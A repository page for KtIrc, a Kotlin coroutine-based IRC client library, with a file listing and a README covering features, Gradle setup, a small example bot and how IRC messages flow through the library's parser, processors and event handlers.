if ((result < 0) && (us->pusb_dev->status & USB_ST_STALLED)) {
US_DEBUGP("STATUS: stall\n");
/* clear the STALL on the endpoint */
result = usb_stor_Bulk_clear_endpt_stall(us, pipein);
if (result >= 0) {
US_DEBUGP("Attempting to get CSW...\n");
result = usb_bulk_msg(us->pusb_dev, pipein,
&csw, US_BULK_CS_WRAP_LEN,
&actlen, USB_BULK_TO);
}
}
if (result < 0) {
US_DEBUGP("Device status: %lx\n", us->pusb_dev->status);
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
}
/* check bulk status */
residue = le32_to_cpu(csw.Residue);
US_DEBUGP("Bulk Status S 0x%x T 0x%x R %u Stat 0x%x\n",
le32_to_cpu(csw.Signature), csw.Tag, residue, csw.Status);
if (csw.Signature != cpu_to_le32(US_BULK_CS_SIGN)) {
US_DEBUGP("Bad CSW signature\n");
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
} else if (csw.Tag != cbw_tag) {
US_DEBUGP("Mismatching tag\n");
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_FAILED;
} else if (csw.Status >= US_BULK_STAT_PHASE) {
US_DEBUGP("Status >= phase\n");
usb_stor_Bulk_reset(us);
return USB_STOR_TRANSPORT_ERROR;
} else if (residue > srb->datalen) {
US_DEBUGP("residue (%uB) > req data (%luB)\n",
residue, srb->datalen);
return USB_STOR_TRANSPORT_FAILED;
} else if (csw.Status == US_BULK_STAT_FAIL) {
US_DEBUGP("FAILED\n");
return USB_STOR_TRANSPORT_FAILED;
}
srb->trans_bytes = min(srb->datalen - residue, (ulong)data_actlen);
return 0;
}
/* This issues a Bulk-only Reset to the device in question, including
* clearing the subsequent endpoint halts that may occur.
*/
int usb_stor_Bulk_reset(struct us_data *us)
{
int result;
int result2;
unsigned int pipe;
US_DEBUGP("%s called\n", __func__);
/* issue the command */
result = usb_control_msg(us->pusb_dev,
usb_sndctrlpipe(us->pusb_dev, 0),
US_BULK_RESET_REQUEST,
USB_TYPE_CLASS | USB_RECIP_INTERFACE,
0, us->ifnum, 0, 0, USB_CNTL_TIMEOUT);
if ((result < 0) && (us->pusb_dev->status & USB_ST_STALLED)) {
US_DEBUGP("Soft reset stalled: %d\n", result);
return result;
}
mdelay(150);
/* clear the bulk endpoints halt */
US_DEBUGP("Soft reset: clearing %s endpoint halt\n", "bulk-in");
pipe = usb_rcvbulkpipe(us->pusb_dev, us->recv_bulk_ep);
result = usb_clear_halt(us->pusb_dev, pipe);
mdelay(150);
US_DEBUGP("Soft reset: clearing %s endpoint halt\n", "bulk-out");
pipe = usb_sndbulkpipe(us->pusb_dev, us->send_bulk_ep);
result2 = usb_clear_halt(us->pusb_dev, pipe);
mdelay(150);
if (result >= 0)
result = result2;
US_DEBUGP("Soft reset %s\n", ((result < 0) ? "failed" : "done"));
return result;
}
|
__label__pos
| 0.769762 |
rust-ini 0.16.0
An Ini configuration file parsing library in Rust
Documentation
Ini parser for Rust
use ini::Ini;
let mut conf = Ini::new();
conf.with_section(Some("User"))
.set("name", "Raspberry树莓")
.set("value", "Pi");
conf.with_section(Some("Library"))
.set("name", "Sun Yat-sen U")
.set("location", "Guangzhou=world");
conf.write_to_file("conf.ini").unwrap();
let i = Ini::load_from_file("conf.ini").unwrap();
for (sec, prop) in i.iter() {
println!("Section: {:?}", sec);
for (k, v) in prop.iter() {
println!("{}:{}", k, v);
}
}
|
__label__pos
| 0.985694 |
evilReiko evilReiko - 6 months ago 49
Node.js Question
Node.js + MongoDB: insert one and return the newly inserted document
I'm wondering if there is a way to insert new document and return it in one in one go.
This is what I'm currently using:
db.collection('mycollection').insertOne(options, function (error, response) {
...
});
Answer
response result contain information of success or not and number of record inserted. but if you want to return inserted data then can try response.ops
db.collection('mycollection').insertOne(doc, function (error, response) {
if(error) {
console.log('Error occurred while inserting');
// return
} else {
console.log('inserted record', response.ops[0]);
// return
}
});
|
__label__pos
| 0.925614 |
blob: 0026f466b462f117a28253e73ea30b23eed03509 [file] [log] [blame]
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import errno
import os
import shutil
import sys
def Main():
parser = argparse.ArgumentParser(description='Create Mac Framework symlinks')
parser.add_argument('--framework', action='store', type=str, required=True)
parser.add_argument('--version', action='store', type=str)
parser.add_argument('--contents', action='store', type=str, nargs='+')
parser.add_argument('--stamp', action='store', type=str, required=True)
args = parser.parse_args()
VERSIONS = 'Versions'
CURRENT = 'Current'
# Ensure the Foo.framework/Versions/A/ directory exists and create the
# Foo.framework/Versions/Current symlink to it.
if args.version:
try:
os.makedirs(os.path.join(args.framework, VERSIONS, args.version), 0o755)
except OSError as e:
if e.errno != errno.EEXIST:
raise e
_Relink(os.path.join(args.version),
os.path.join(args.framework, VERSIONS, CURRENT))
# Establish the top-level symlinks in the framework bundle. The dest of
# the symlinks may not exist yet.
if args.contents:
for item in args.contents:
_Relink(os.path.join(VERSIONS, CURRENT, item),
os.path.join(args.framework, item))
# Write out a stamp file.
if args.stamp:
with open(args.stamp, 'w') as f:
f.write(str(args))
return 0
def _Relink(dest, link):
"""Creates a symlink to |dest| named |link|. If |link| already exists,
it is overwritten."""
try:
os.remove(link)
except OSError as e:
if e.errno != errno.ENOENT:
shutil.rmtree(link)
os.symlink(dest, link)
if __name__ == '__main__':
sys.exit(Main())
|
__label__pos
| 0.968919 |
Date sub - interval mysql
Hello. I am trying to search some records based on an interval:
$rates = ExchangeRate::find(array(
"exchange_date BETWEEN DATE_SUB(DATE(:date:),INTERVAL 3 DAY) AND :date:",
"bind" => array(
'date' => $date
),
"cache" => array(
"key" => "exchange_rate_$date",
"lifetime" => 3600 * 24
)
));
This will end up with the following error:
"Syntax error, unexpected token INTEGER(3), near to ' DAY) AND :date:', when parsing: SELECT [App\\Core\\Models\\Exchange\\ExchangeRate].* FROM [App\\Core\\Models\\Exchange\\ExchangeRate] WHERE exchange_date BETWEEN DATE_SUB(DATE(':date:'),INTERVAL 3 DAY) AND :date: (172
I have tried to bind the entire mysql function as \Phalcon\Db\RawValue(), but also without success:
new \Phalcon\Db\RawValue("DATE_SUB(DATE($date),INTERVAL 3 DAY)");
• I know how how to add and susbtract days via PHP, please comment strictly related to the ORM.
Thanks you.
95.8k
Interval is not supported since it's a MySQL only feature
47.7k
edited Mar '14
Ok. So I should relay on raw sql or php in this case, correct ?
I'd +1 a request for getting this functionality added. In my opinion MySQL is by far the most commonly used DBMS for web applications, so some effort should be expended to match functionality provided by MySQL.
@Calin - It doesn't look like you NEED to use the MySQL function. Can't you just do the date math in PHP?:
$date2 = strtotime('-3 days',$date)
$rates = ExchangeRate::find(array(
"exchange_date BETWEEN :date2: AND :date:",
"bind" => array(
'date' => $date
'date2'=> $date2
),
"cache" => array(
"key" => "exchange_rate_$date",
"lifetime" => 3600 * 24
)
));
47.7k
@quasipickle , after Phalcon's answer, i am using php. But in general, it would be nice to be able to use more mysql built-in functions. On the other hand, if your app will grow and you will need to switch from Mysql, it is a goot approach NOT TO relay / use the built in functions. I am also not sure why if i am using Phalcon\Db\Adapter\Pdo\Mysql i can't use mysql at it's full power. Some answers on this "issues" would be appreciated :)
edited Oct '14
I consider the "what if you change your RDMS" problem to be a non-issue. How many times have you changed the database back-end on one of your apps? If you do need to switch from MySQL to, say, Oracle because your app suddenly has 1 million+ users, you're obviously going to be revisiting the code anyway.
It seems like the adapter still has to parse PHQL statements into statements MySQL will be able to read. I agree though - if a separate adapter exists for a particular brand of SQL, why not provide all the functionality for that particular brand.
95.8k
edited Mar '14
I have added an extended MySQL dialect to the incubator that introduces handling of some specific PHQL functions that add support for INTERVAL alike expressions and fulltext searchs:
Changing the default dialect:
$di->set('db', function() use ($config) {
return new \Phalcon\Db\Adapter\Pdo\Mysql(array(
"host" => $config->database->host,
"username" => $config->database->username,
"password" => $config->database->password,
"dbname" => $config->database->name,
"dialectClass" => '\Phalcon\Db\Dialect\MysqlExtended'
));
});
Using the custom functions:
// SELECT `customers`.`created_at` - INTERVAL 7 DAY FROM `customers`
$data = $this->modelsManager->executeQuery(
'SELECT created_at - DATE_INTERVAL(7, "DAY") FROM App\Models\Customers'
);
// SELECT `customers`.`id`, `customers`.`name` FROM `customers` WHERE MATCH(`customers`.`name`, `customers`.`description`) AGAINST ("+CEO")
$data = $this->modelsManager->executeQuery(
'SELECT id, name FROM App\Models\Customers WHERE FULLTEXT_MATCH(name, description, "+CEO")'
);
// SELECT `customers`.`id`, `customers`.`name` FROM `customers` WHERE MATCH(`customers`.`name`, `customers`.`description`) AGAINST ("+CEO" IN BOOLEAN MODE)
$data = $this->modelsManager->executeQuery(
'SELECT id, name FROM App\Models\Customers WHERE FULLTEXT_MATCH_BMODE(name, description, "+CEO")'
);
https://github.com/phalcon/incubator/tree/master/Library/Phalcon/Db#dialectmysqlextended
268
@quasipickle: the issue, when using PHP's date, is that you don't rely on the MySQL server's date. If the 2 servers are not in sync, you're running into a lot of trouble. You must use the MySQL's server's date. Even if the 2 are on the same server, NOW() is not exactly the same between your PHP statement and the effective request on MySQL.
@phalcon: thanks for implementing this.
268
@phalcon: you can't implement this on phalcon 2.0.0, as the getSqlExpression is «final». Is there any other workaround?
5.3k
When I add this line
"dialectClass" => '\Phalcon\Db\Dialect\MysqlExtended'
PHP return the error:
Fatal error: Class 'Phalcon\Db\Dialect\MysqlExtended' not found
How can I fix this issue?
This thread is 3 years old. If you have a new question, please start a new thread.
|
__label__pos
| 0.9293 |
Monday, July 14, 2014
A Multi-Table Trick to Speed up Single-Table UPDATE/DELETE Statements
This post appeared first on mysqlserverteam.com
In MySQL, query optimization of single-table UPDATE/DELETE statements is more limited than for SELECT statements. I guess the main reason for this is to limit the optimizer overhead for very simple statements. However, this also means that optimization opportunities are sometimes missed for more complex UPDATE/DELETE statements.
Example
Using the DBT-3 database, the following SQL statement will increase prices by 10% on parts from suppliers in the specified country:
UPDATE part
SET p_retailprice = p_retailprice*1.10
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
Visual EXPLAIN in MySQL Workbench shows that the optimizer will choose the following execution plan for this UPDATE statement:
update-subquery
That is, for every row in the part table, MySQL will check if this part is supplied by a supplier of the requested nationality. Consider the following similar SELECT statement:
SELECT * FROM part
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
In MySQL 5.6, the query optimizer will apply semi-join transformation to this query. Hence, the execution plan is quite different from the similar UPDATE statement:
select-semijoin
As you can see, there is no sub-query in this plan. The query has been transformed into a three-way join. The great advantage of this semi-join transformation is that the optimizer is now free to re-arrange the order of the tables to be joined. Instead of having to go through all 179,000 parts, it will now start with the estimated 414 suppliers from the given country and find all parts supplied by them. This is obviously more efficient, and it would be good if MySQL would use the same approach for the UPDATE statement.
The Multi-Table Trick
Unlike single-table UPDATE statements, the MySQL Optimizer will use all available optimizations for multi-table UPDATE statements. This means that by rewriting the query as follows, the semi-join optimizations will apply:
UPDATE part, (SELECT 1) dummy
SET p_retailprice = p_retailprice*1.10
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
Notice the extra dummy table in the first line. Here is what happens when I execute the single-table and multi-table variants on a DBT-3 database (scale factor 1):
mysql> UPDATE part SET p_retailprice = p_retailprice*1.10 WHERE p_partkey IN (SELECT ps_partkey FROM partsupp JOIN supplier ON ps_suppkey = s_suppkey WHERE s_nationkey = 4);
Query OK, 31097 rows affected, 28003 warnings (2.63 sec)
Rows matched: 31097 Changed: 31097 Warnings: 28003
mysql> ROLLBACK;
Query OK, 0 rows affected (0.20 sec)
mysql> UPDATE part, (SELECT 1) dummy SET p_retailprice = p_retailprice*1.10 WHERE p_partkey IN (SELECT ps_partkey FROM partsupp JOIN supplier ON ps_suppkey = s_suppkey WHERE s_nationkey = 4);
Query OK, 31097 rows affected, 28003 warnings (0.40 sec)
Rows matched: 31097 Changed: 31097 Warnings: 28003
As you can see, execution time is reduced from 2.63 seconds to 0.40 seconds by using this trick. (I had executed both statements several times before, so the reported execution times are for a steady state with all accessed data in memory.)
Multi-Table DELETE
The same trick can be used for DELETE statements. Instead of the single-table variant,
DELETE FROM part
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
you can use the equivalent multi-table variant:
DELETE part FROM part
WHERE p_partkey IN
(SELECT ps_partkey
FROM partsupp JOIN supplier
ON ps_suppkey = s_suppkey
WHERE s_nationkey = 4);
This rewrite gives a similar performance improvement as reported for the above UPDATE statement.
No comments:
Post a Comment
|
__label__pos
| 0.835818 |
Now Reading
My first Web Scraping project – Analyzing Flipkart Product Reviews using Text Mining
My first Web Scraping project – Analyzing Flipkart Product Reviews using Text Mining
Flipkart review scraping
E-commerce websites generate large amounts of textual data. These firms hire data science professionals to refine this unstructured data and gather meaningful insights from it that can help in understanding the end-user in a better way. For example, by analyzing product reviews, Flipkart can understand the insights of the product, Netflix can find users’ likeness on their content and we can’t imagine doing this analysis will happen without Text analytics.
Topics we cover in this article:
• How to Extract Product reviews from Flipkart website
• Preprocessing of the Extracted reviews
• Extracting and Analyzing Positive reviews
• Extracting and Negative reviews
In this article, we will extract the reviews of Macbook air laptop from the Flipkart website and perform text analysis.
Register for our upcoming Masterclass>>
Hands-on implementation of Flipkart review scarping
#Importing required libraries
import requests
from bs4 import BeautifulSoup as bs
import re
import nltk
import matplotlib.pyplot as plt
from wordcloud import WordCloud
import os
Extracting reviews from Flipkart for MacBook Air
Here we are going to extract reviews of Macbook air laptops from the URL.
#Scraping review using beautifulsoup
macbook_reviews=[]
for i in range(1,30):
mac=[]
url="https://www.flipkart.com/apple-macbook-air-core-i5-5th-gen-8-gb-128-gb-ssd-mac-os-sierra-mqd32hn-a-a1466/product-reviews/itmevcpqqhf6azn3?pid=COMEVCPQBXBDFJ8C&page="+str(i)
response = requests.get(url)
soup = bs(response.content,"html.parser")# creating soup object to iterate over the extracted content
reviews = soup.findAll("div",attrs={"class","qwjRop"})# Extracting the content under specific tags
for i in range(len(reviews)):
mac.append(reviews[i].text)
macbook_reviews=macbook_reviews+mac
#here we saving the extracted data
with open("macbook.txt","w",encoding='utf8') as output:
output.write(str(macbook_reviews))
Until here we extracted reviews from the website and stored them in a file named macbook_reviews.
Preprocessing
The extracted product reviews include unwanted characters like spaces, capital letters, symbols, smiley emojis. We don’t want to include those unwanted characters in text analysis, so in preprocessing we need to clean the data by removing unwanted characters.
Looking for a job change? Let us help you.
os.getcwd()
os.chdir("/content/chider")
# Joining all the reviews into single paragraph
mac_rev_string = " ".join(macbook_reviews)
# Removing unwanted symbols incase if exists
mac_rev_string = re.sub("[^A-Za-z" "]+"," ",mac_rev_string).lower()
mac_rev_string = re.sub("[0-9" "]+"," ",mac_rev_string)
#here we are splitting the words as individual string
mac_reviews_words = mac_rev_string.split(" ")
#removing the stop words
#stop_words = stopwords('english')
In the below code snippet, we will gather the words from the reviews and display it using the word cloud
with open("/content/stop.txt","r") as sw:
stopwords = sw.read()
temp = ["this","is","awsome","Data","Science"]
[i for i in temp if i not in "is"]
mac_reviews_words = [w for w in mac_reviews_words if not w in stopwords]
mac_rev_string = " ".join(mac_reviews_words)
#creating word cloud for all words
wordcloud_mac = WordCloud(
background_color='black',
width=1800,
height=1400
).generate(mac_rev_string)
plt.imshow(wordcloud_mac)
From word cloud output the words like good, read, the laptop appears in the bigger size that illustrates these words are repeated more times in the MacBook air reviews. By observing this word cloud, we can see the highlighted words like performance, battery, delivery, the laptop, we can’t conclude how the battery works and, how it performs, to get insights from this output we need to divide this into a positive and negative word cloud.
See Also
Web scraping using Node.js framework Puppeteer
In the below code snippet we will extract Positive words from product reviews
with open("/content/positive-words.txt","r") as pos:
poswords = pos.read().split("\n")
poswords = poswords[36:]
mac_pos_in_pos = " ".join ([w for w in mac_reviews_words if w in poswords])
wordcloud_pos_in_pos = WordCloud(
background_color='black',
width=1800,
height=1400
).generate(mac_pos_in_pos)
plt.imshow(wordcloud_pos_in_pos)
#here we get wordcloud of all postive words in reviews
Flipkart review scraping
Here, through this positive word cloud, we can get some insights like the product was good, smooth, fast, awesome product, recommend to others, portable to use, beautiful product, these are the positive insights from the MacBook air product.
In the below code snippet we will extract Negative words from product reviews
with open("/content/negative-words.txt","r",encoding = "ISO-8859-1") as neg:
negwords = neg.read().split("\n")
negwords = negwords[37:]
# negative word cloud
# Choosing the only words which are present in negwords
mac_neg_in_neg = " ".join ([w for w in mac_reviews_words if w in negwords])
wordcloud_neg_in_neg = WordCloud(
background_color='black',
width=1800,
height=1400
).generate(mac_neg_in_neg)
plt.imshow(wordcloud_neg_in_neg)
#here we are getting the most repeated negative Wordcloud
Flipkart review scraping
Now through this negative word cloud, we can illustrate that the product was lag, slow, crashed, we have issues in the product, it was so expensive, pathetic.
Conclusion
By analyzing the product reviews using text mining we gathered most appeared positive and negative words using the word clouds. We can conclude that text mining gains insights into customer sentiment and can help companies in addressing the problems. This technique provides an opportunity to improve the overall customer experience which returns huge profits.
What Do You Think?
Join Our Discord Server. Be part of an engaging online community. Join Here.
Subscribe to our Newsletter
Get the latest updates and relevant offers by sharing your email.
Copyright Analytics India Magazine Pvt Ltd
Scroll To Top
|
__label__pos
| 0.986077 |
blob: 4eec856e6d1528540f1c9cc48a1625acc52f2074 [file] [log] [blame]
// Copyright (c) 2015, the Dart project authors. Please see the AUTHORS file
// for details. All rights reserved. Use of this source code is governed by a
// BSD-style license that can be found in the LICENSE file.
library dart_style.example.format;
import 'dart:io';
import 'dart:mirrors';
import 'package:path/path.dart' as p;
import 'package:dart_style/dart_style.dart';
import 'package:dart_style/src/debug.dart' as debug;
void main(List<String> args) {
// Enable debugging so you can see some of the formatter's internal state.
// Normal users do not do this.
debug.traceChunkBuilder = true;
debug.traceLineWriter = true;
debug.traceSplitter = true;
debug.useAnsiColors = true;
runTest("regression/0000/0068.stmt", 14);
formatStmt("hello(world);");
}
void formatStmt(String source, [int pageWidth = 80]) {
runFormatter(source, pageWidth, isCompilationUnit: false);
}
void formatUnit(String source, [int pageWidth = 80]) {
runFormatter(source, pageWidth, isCompilationUnit: true);
}
void runFormatter(String source, int pageWidth, {bool isCompilationUnit}) {
try {
var formatter = new DartFormatter(pageWidth: pageWidth);
var result;
if (isCompilationUnit) {
result = formatter.format(source);
} else {
result = formatter.formatStatement(source);
}
if (debug.useAnsiColors) {
result = result.replaceAll(" ", debug.gray(debug.unicodeMidDot));
}
drawRuler("before", pageWidth);
print(source);
drawRuler("after", pageWidth);
print(result);
} on FormatterException catch (error) {
print(error.message());
}
}
void drawRuler(String label, int width) {
var padding = " " * (width - label.length - 1);
print("$label:$padding|");
}
/// Runs the formatter test starting on [line] at [path] inside the "test"
/// directory.
void runTest(String path, int line) {
var indentPattern = new RegExp(r"^\(indent (\d+)\)\s*");
// Locate the "test" directory. Use mirrors so that this works with the test
// package, which loads this suite into an isolate.
var testDir = p.join(
p.dirname(currentMirrorSystem()
.findLibrary(#dart_style.example.format)
.uri
.path),
"../test");
var lines = new File(p.join(testDir, path)).readAsLinesSync();
// The first line may have a "|" to indicate the page width.
var pageWidth = 80;
if (lines[0].endsWith("|")) {
pageWidth = lines[0].indexOf("|");
lines = lines.skip(1).toList();
}
var i = 0;
while (i < lines.length) {
var description = lines[i++].replaceAll(">>>", "").trim();
// Let the test specify a leading indentation. This is handy for
// regression tests which often come from a chunk of nested code.
var leadingIndent = 0;
var indentMatch = indentPattern.firstMatch(description);
if (indentMatch != null) {
leadingIndent = int.parse(indentMatch[1]);
description = description.substring(indentMatch.end);
}
if (description == "") {
description = "line ${i + 1}";
} else {
description = "line ${i + 1}: $description";
}
var startLine = i + 1;
var input = "";
while (!lines[i].startsWith("<<<")) {
input += lines[i++] + "\n";
}
var expectedOutput = "";
while (++i < lines.length && !lines[i].startsWith(">>>")) {
expectedOutput += lines[i] + "\n";
}
if (line != startLine) continue;
var isCompilationUnit = p.extension(path) == ".unit";
var inputCode =
_extractSelection(input, isCompilationUnit: isCompilationUnit);
var expected =
_extractSelection(expectedOutput, isCompilationUnit: isCompilationUnit);
var formatter =
new DartFormatter(pageWidth: pageWidth, indent: leadingIndent);
var actual = formatter.formatSource(inputCode);
// The test files always put a newline at the end of the expectation.
// Statements from the formatter (correctly) don't have that, so add
// one to line up with the expected result.
var actualText = actual.text;
if (!isCompilationUnit) actualText += "\n";
print("$path $description");
drawRuler("before", pageWidth);
print(input);
if (actualText == expected.text) {
drawRuler("result", pageWidth);
print(actualText);
} else {
print("FAIL");
drawRuler("expected", pageWidth);
print(expected.text);
drawRuler("actual", pageWidth);
print(actualText);
}
}
}
/// Given a source string that contains ‹ and › to indicate a selection, returns
/// a [SourceCode] with the text (with the selection markers removed) and the
/// correct selection range.
SourceCode _extractSelection(String source, {bool isCompilationUnit: false}) {
var start = source.indexOf("‹");
source = source.replaceAll("‹", "");
var end = source.indexOf("›");
source = source.replaceAll("›", "");
return new SourceCode(source,
isCompilationUnit: isCompilationUnit,
selectionStart: start == -1 ? null : start,
selectionLength: end == -1 ? null : end - start);
}
|
__label__pos
| 0.999604 |
Carbon vs Silicon
Are WE the dinosaurs of CARBON life as SILICON learns to take over?
Dr. Spock said “yes” in 1967 and Dr. Paul McCready said “yes” in 1998. Were they right?
Carbon vs Silicon
I confess, I never heard of Paul McCready until I decided to write this essay. I stumbled on him searching for a visual to complete this Twart on the existential war between Carbon and Silicon for dominance of earth.
What, you didn’t know a war was going on? Sure, Silicon is our friend right now; look at all it does for us carbon life forms. But friends can become enemies before we know it, especially friends that share many of the same desires like Carbon and Silicon do; they are mates who have been very close sexy cousins (see excerpt below) for billions of years. (They both apparently sleep around with a lot other elements.)
[Tutorial Interruption, sorry; skip if you brain doesn't care.] "Carbon and Silicon both have a so-called valence of four--meaning that individual atoms make four bonds with other elements in forming chemical compounds. Each element bonds to oxygen. Each forms long chains, called polymers. In the simplest case, carbon yields a polymer that is a plastic used in synthetic fibers and equipment. Silicon yields polymeric silicones, which we use to waterproof cloth or lubricate metal and plastic parts. But when carbon oxidizes--or unites with oxygen say, during burning--it becomes the gas carbon dioxide; silicon oxidizes to the solid silicon dioxide, called silica [or sand], one basic reason why it cannot support life [as we know it]."
Star Trek was already suspicious of Silicon 31 years before McCready’s personal pronouncement, and that was 51 years ago now in 2018! But you say that was just science fiction, not reality. Really? It’s worth second look since humanity has become steeped in silicon.
Star Trek explored the idea of a silicon life form in a 1967 TV episode The Devil in the Dark about an underground silicon monster named Horta that lived in tunnels. Horta looked like a huge hunk of hamburger that could shuffle along the ground–a laughable image for a monster. (Hmm …to shoot and kill it, or; to cook and eat it? What choice would Kirk and Spock make?)
Based on my compulsive crack research the word Horta probably came originally from the Biblical word “Hor” for mound or mountain, which later also came to mean pregnant. With only primitive special effects technology at the time, Star Trek’s wacky idea was converted into a thoughtful TV script and highly-rated timeless drama in just three days by famed writer and producer, Gene L. Coon, in the early days of TV. But I digress.
McCready’s TED Talk
Dr. Paul McCready was a deep-thinking problem solver, a much-celebrated innovative scientist and engineer, who was the first person to fulfill Leonardo da Vinci’s dream of a human flying under his own power. McCready was a first-rate technologist noted for finding innovative ways to do more with less based on his profound understanding of the awesome innovative power of nature. Experience his authentic big-picture wisdom in rare concurrent video-voice-text TED talk +my essay commentary.
He passed away in 2007 at the age of 81. In his 1998 TED Talk he summed up his view of how humanity and its technology fit in with the rest of the natural world. He spoke in an informal conversational tone without notes, along with a few key slides. His theme throughout was the growing power humans were amassing over nature, which was two decades before our current hyper-connected wireless silicon-based FrictionLessSociety (FLS).
As Dr. McCready got to the end of his talk, he paused as if asking his audience for their permission to let him read his conclusions, i.e., “to paint his version of the Big Picture.”
He began: “At last, I put in three sentences and had it say what I wanted.”
Dr. McCready reads: “Over billions of years on a unique sphere, chance has painted a thin covering of life — complex, improbable, wonderful and fragile. Suddenly, we humans — a recently arrived species, no longer subject to the checks and balances inherent in nature — have grown in population, technology and intelligence to a position of terrible power. We now wield the paintbrush. And that’s serious: We’re not very bright. We’re short on wisdom. We’re high on technology. Where’s it going to lead? There is no planet B.”
He continued talking informally now, almost imploring the audience to help answer his question.
“This is not a forecast. This is a warning, and we have to think seriously about it. And that time when this is happening is not 100 years or 500 years. Things are going on this decade, next decade; it’s a very short time that we have to decide what we are going to do. And if we can get some agreement on where we want the world to be — desirable, sustainable when your kids reach your age — I think we actually can reach it.
(Is this why kids today seem so angry with prior generations, for not having dealt with the negative consequences of what we created?)
McCready closed his formal remarks with this sobering thought
“…Maybe this is a forecast, afterall…I personally think the surviving intelligent life form on earth is not going to be carbon-based; it’s going to be silicon-based.”
And then, with a sheepish grin, he delighted his audience and lifted their spirits “with one final bit of sparkle” by giving a live autonomous flight demonstration over the audiences’ heads of an an “utterly impractical flight vehicle, a little ornithopter wing-flapping rubber-band powered device that weighed one gram.”
It got stuck in the rafters like a mechanical moth fluttering its wings against the roof, going nowhere. Everyone laughed.
Living in a Blur of Bits
Dr. McCready did not use the phrase “Blur of Bits” nor Frictionless Society (FLS) to describe the future as he saw it from twenty years ago, but he might have. This is what it looks like to me.
Based on his talk, he was prescient in his warning, and perhaps even in his forecast as well, because “Silicon” arguably has a “life of its own” in billions of Carbon Lives today. It pervades every aspect of society as data-being-processed:
Who you are, what you value, where you are, what you are doing, how you are doing, what and when you plan to do it, and why.
CEO Ginni Rometty stated in her opening remarks at IBM’s February Think Conference that “only 20% of the world’s data is currently searchable,” implying that the other 80% is available for economic growth by all kinds of businesses large and small. IBM’s plan? Everyone will use Watson’s AI to monetize this data to solve problems for society (and move IBM back to its rightful place at the top of the Silicon Palace).
“Watson took a year to figure out it’s first cancer; now it takes one month. It gets smarter and smarter. Programming a computer is dead; deep AI learning with data is the future.” (Reminds me of the hammer and nail view of reality.)
The existential problematique of the FLS is that data, as information, is a complex chameleon of abstract potential. In physical form it is a liquid lizard that can change shape, color, size, dynamics, and merge seamlessly with other information to produce endless variety. It’s the digital genie in the bottle we have let loose without thinking carefully about what wishes we want to be granted, which are turning out to be endless!
Is this what Carbon wants, or what Silicon wants?
From #ChaunceySays Twitter Commentary @viewshift1:
1. If humans are JUST data…
2…humans can be any THING they can compute.
3. Does this mean we are just EQUATIONS, and LIFE is just a PROBLEM to be solved?
The language of people is WORDS & we are all the editors. The language of data is MATH. The math of life is DNA data. The editor of LIFE is CRISPR. Who edits it?
1 thought on “Carbon vs Silicon
Leave a Reply
Fill in your details below or click an icon to log in:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Change )
Twitter picture
You are commenting using your Twitter account. Log Out / Change )
Facebook photo
You are commenting using your Facebook account. Log Out / Change )
Connecting to %s
|
__label__pos
| 0.592465 |
Testing vs Development
Software testing and software development are two distinct terms in computing. They are two different and important stages in the life of a software program because they perform different functions that support the existence and efficiency of a program. It is important to define each of these terms and identify the various roles they play.
Software testing
Software testing is the process of confirming the correctness, quality, and completeness of a computer software. It involves carrying out some specific activities that are designed to spot the errors in a software program so that it can be corrected before it is released and distributed to the end users.
The test helps the developers to check whether the result of the test will correspond with the expected result as well as check if the software is error free. How is this done?
To test a software, it is operated under some controlled conditions to see whether the output is the expected output, study the behavior of the program, look for errors, and check whether the software will meet the needs of the user or not.
For instance, if a program is designed to process the payroll of a company, during testing, the various stages of processing of payroll will be tested on the program. Different parameters may be tested in the program to ensure that it functions in all the areas where it is expected to be used by the end user. The program may fail or show some flaws such as inaccurate calculation or omission of some data, factors that can have serious effects on the output of the program. When this occurs, the program will be taken back to the software programmer to correct all the errors. That is the essence of software testing.
Software development
While software testing involves analyzing software program to determine its efficiency and errors in addition to evaluating some features of the software, software development refers to how the software program is developed. It is simply the process of writing a computer code and maintaining it. In a broad sense, software development involves all the developmental stages of the software from the conception of the idea to the launching of the programs.
While software development may sound simple, the process may involve an extensive research, prototyping, re-engineering, developing an extensive algorithm, drawing a flowchart, several modifications, coding for hundreds of hours, debugging both serious and minor errors, and other processes that may contribute to the existence of the software program. Software development is also called application development, enterprise application development, designing software, platform development, and the likes.
This brings out the difference in the two terms. While software development refers to all the processes that culminate in the existence of a software program, software testing is checking the software to see areas of improvement, detect potential errors, test the software for accuracy, or any other activities that will ensure the successful launching of error-free software. It is a way of finding out whether a program is functioning in conformity with the objective of the software when it was under development.
Software programs are tested by software developers who are also called programmers while a software program can be tested by a software tester, test lead, test administrator, test designer, automation tester, or manager.
Although the testing is not a part of the software development, it serves as the guide to the developer to see what can go wrong and render their efforts useless.
In essence, software development precedes software testing. Without developed software, there is nothing to be tested. On the other hand, without well-tested software, a program is nothing.
More References / Tutorials
|
__label__pos
| 0.830302 |
Beefy Boxes and Bandwidth Generously Provided by pair Networks
Welcome to the Monastery
PerlMonks
Re^2: partition of an array
by rir (Vicar)
on Apr 22, 2009 at 04:19 UTC ( #759178=note: print w/ replies, xml ) Need Help??
in reply to Re: partition of an array
in thread partition of an array
For the universe of positive integers, I sensed a simple solution lurking. I found one but I didn't like how it coded up: It was just pushing the largest onto a half, if it was forced onto the currently smaller half, put it in a protest queue in that half. When ready to add a number to the other half in the presence of a protest, you would instead pop the top of the queue to the other half. This works and is fairly efficient but it is messy in the control code.
Today, it just struck me that you don't have to keep the halves abs( @left - @right) <= 1 as you create them; just make sure there is enough remaining to fill the other half.
